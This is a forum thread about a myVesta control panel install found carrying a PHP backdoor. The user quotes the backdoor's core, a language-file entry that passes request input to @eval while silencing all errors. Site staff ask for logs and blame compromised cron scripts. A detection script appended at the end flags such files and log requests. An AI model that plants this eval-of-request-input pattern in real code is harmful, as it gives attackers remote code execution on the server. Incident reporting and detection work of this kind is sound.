BACKDOOR

danger321992
Posts: 2
Joined: Sun Aug 18, 2024 12:30 am

myVesta was installed on a clean Debian 10 server with these commands:
wget http://c.myvestacp.com/vst-install-debian.sh
sudo bash vst-install-debian.sh

-------
My server has a private IP, no projects on it (just a clean server with Vesta installed) and a non-standard Vesta port.
After ~10-15 hours somebody tried to access the VestaCP file /inc/i18n/yi.php and got a 404 error:
POST /inc/i18n/yi.php HTTP/1.1 "404" 1254 "-" "-" "-"
After 4 days somebody again accessed /inc/i18n/yi.php and got 200 OK:
POST /inc/i18n/yi.php HTTP/1.1 "200" 110 "-" "-" "-"

When I checked this file, it contained a backdoor:

// attacker-supplied input is read from the request
$vcp_yi_fmt = $_REQUEST['vcp_yi_fmt'];
// every error and exception is silently swallowed so nothing reaches the logs
set_error_handler(function($severity, $message, $file, $line) {
    return true;
});
set_exception_handler(function($exception) {
    return true;
});
//...
// the request input is executed as PHP inside an otherwise normal language array entry
'Licence Deactivated' => @eval($vcp_yi_fmt),
//...
The backdoor file has the same modification time as all the other language files in /usr/local/vesta/web/inc/i18n/ (the myVesta install time).

I want to know how the hackers found my server IP: it is private and has no public domains, ports 80/443 are hidden, and only I know that Vesta is installed on this IP. And Vesta is on a non-standard port...
Where could this backdoor have come from?
myVesta
Site Admin
Posts: 964
Joined: Fri Jun 19, 2020 9:59 am
Has thanked: 10 times
Been thanked: 6 times

I would advise you to send these files to [email protected]:


/var/log/vesta/nginx-access.log* (wildcard means: .1.log, .2.log.gz, etc... if exists)
/var/log/vesta/nginx-error.log*
/var/log/vesta/system.log*
/var/log/vesta/error.log*
/var/log/auth.log*
/var/log/syslog*
/root/.bash_history
Put these files in one .tar or .zip archive.

There is nothing suspicious on our 200 servers in our hosting company.
We just did a deep check on our 200 servers (last modification of files, grep for '@eval', also carefully checked our c.myvestacp.com and apt.myvestacp.com, modifications, md5 sums, last 30 root logins, etc... also checked again all github commits for last 4 months).

By the way, did you set "secret_url" for myVesta?
danger321992
Posts: 2
Joined: Sun Aug 18, 2024 12:30 am

I sent my logs by email.

I don't use the secret URL function.
In the Vesta auth.log there are only my logins from my IP, no others.
myVesta
Site Admin
Posts: 964
Joined: Fri Jun 19, 2020 9:59 am
Has thanked: 10 times
Been thanked: 6 times

We forgot to reply here.
There is no evidence that our servers were compromised (otherwise, this topic would burn with new cases).
The user ran PHP cronjobs as an 'admin' user (which is a very bad idea), and we believe that the user's PHP scripts were compromised. The hacker then easily got high privileges via cron, via 'sudo admin ....'
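An added example, not code from this thread or from myVesta, that combines the two checks the thread points at: it flags the nginx access-log lines quoted in the first post and applies the '@eval' grep the admin mentions, widened to the request-input-into-eval and error-silencing pattern of the backdoor shown above. The log-line layout is assumed from the quoted lines, and the sample log and sample PHP source are constructed for the example.

```python
import re
from pathlib import Path

# Constructed sample: the two nginx access-log lines quoted in the thread plus one benign request.
SAMPLE_LOG = """\
POST /inc/i18n/yi.php HTTP/1.1 "404" 1254 "-" "-" "-"
GET /login/ HTTP/1.1 "200" 2310 "-" "Mozilla/5.0" "-"
POST /inc/i18n/yi.php HTTP/1.1 "200" 110 "-" "-" "-"
"""
# Constructed sample reproducing the shape of the backdoor shown in the thread.
BACKDOOR_SAMPLE = """<?php
$vcp_yi_fmt = $_REQUEST['vcp_yi_fmt'];
set_error_handler(function($severity, $message, $file, $line) { return true; });
return array('Licence Deactivated' => @eval($vcp_yi_fmt));
"""
LOG_RE = re.compile(r'^(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+ "(?P<status>\d{3})"')
# Traits of the backdoor: request input reaching eval(), and handlers that swallow every error.
EVAL_RE = re.compile(r'\beval\s*\(')
INPUT_RE = re.compile(r'\$_(REQUEST|POST|GET|COOKIE)\s*\[')
SILENCE_RE = re.compile(r'set_(error|exception)_handler\s*\(')

def suspicious_requests(log_text):
    """(method, path, status) for requests aimed directly at a PHP file under /inc/.
    Include/language files are never a legitimate entry point; a 200 means it executed."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and m['path'].startswith('/inc/') and m['path'].endswith('.php'):
            hits.append((m['method'], m['path'], int(m['status'])))
    return hits

def scan_php_source(src):
    """Classify one PHP source string; returns a set of findings, empty if clean."""
    findings = set()
    if EVAL_RE.search(src) and INPUT_RE.search(src):
        findings.add('eval-of-request-input')
    if SILENCE_RE.search(src):
        findings.add('error-silencing')
    return findings

def scan_php_dir(directory):
    """Scan every .php file in a directory such as /usr/local/vesta/web/inc/i18n/.
    Do not trust mtime: the thread's backdoor had the same timestamp as the real files."""
    results = {}
    for p in Path(directory).glob('*.php'):
        found = scan_php_source(p.read_text(errors='replace'))
        if found:
            results[p.name] = found
    return results
```

Run `scan_php_dir('/usr/local/vesta/web/inc/i18n/')` on the server and feed `/var/log/vesta/nginx-access.log` to `suspicious_requests` to reproduce the checks on real data.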